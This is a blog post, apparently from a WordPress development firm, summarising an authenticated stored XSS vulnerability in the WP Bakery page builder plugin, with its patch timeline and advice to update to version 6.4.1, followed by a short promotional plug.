WP Bakery WordPress Plugin Vulnerability Affects Over 4 Million Sites
WP Bakery WordPress Plugin Vulnerability Affects Over 4 Million Sites
Analysts found vulnerability in WP Bakery page builder that allows an attacker to inject malicious JavaScript into pages and posts. The vulnerability allows an attacker to inject code into pages and posts that then attacks site visitor browsers.
Authenticated Stored Cross-Site Scripting (XSS) Vulnerability
Cross-site scripting vulnerabilities are described by an attacker gaining the ability to target the browsers of visitors through the use of malicious scripts that were surreptitiously placed on a website.
XSS attacks are among the most common sort of vulnerabilities.
This particular attack is called an Authenticated Stored Cross-Site Scripting Vulnerability. A Stored XSS vulnerability is one in which a script is placed in the site itself by an attacker.
But this is Authenticated Stored XSS vulnerability, meaning that the attacker must have site credentials in order to execute the attack.
WP Bakery Authenticated Stored XSS weakness
This particular WP Bakery vulnerability requires that the attacker obtain contributor or creator level posting credentials to a website.
Once an attacker has the credentials they are able to inject scripts on any posts or pages. Its also enables the attacker to change the posts made by other users.
This vulnerability was composed of multiple flaws.
The flaws allowed the injection of HTML and JavaScript into a credentialed users posts or pages and also to those of other authors. There was also another particular defect that targeted buttons that had a JavaScript functionality attached to it.
According to WordFence:
“The plugin also had custom onclick functionality for buttons. This made it possible for an attacker to inject malicious JavaScript in a button that would execute on a click of the button. Furthermore, contributor and author level users were able to use the vc_raw_js, vc_raw_html, and button using custom_onclick shortcodes to add malicious JavaScript to posts.”
WP Bakery Page Builder 6.4 and Under Are Affected
The vulnerability was found in late July 2020. WP Bakery gave a fix in late August but other issues actually remained, including in a second patch issued in early September.
The last fix that closed the vulnerability was issued on September 24, 2020.
Plugin software developers publish a changelog. The changelog content is what appears in the WordPress admin plugin area that communicates what an update is about.
Tragically, WP Bakery’s changelog doesn’t reflect the urgency of the update because it doesn’t explicitly say that it is fixing vulnerability. The changelog refers to the vulnerability patches as improvements.
The WP Bakery Page Builder Plugin is frequently included in themes. Publishers should check their plugins and ensure they have the most recent and most secure version which is 6.4.1.
We at CodeLedge, are Sweden’s best WordPress Development Services provider. We are the experts at developing creative WordPress websites with effective page load speed. Feel free to talk with us at hi@codeledge.net or get a quote from here.
Citations
Vulnerability Exposes Over 4 Million Sites Using WPBakery
WP Bakery Page Builder Changelog
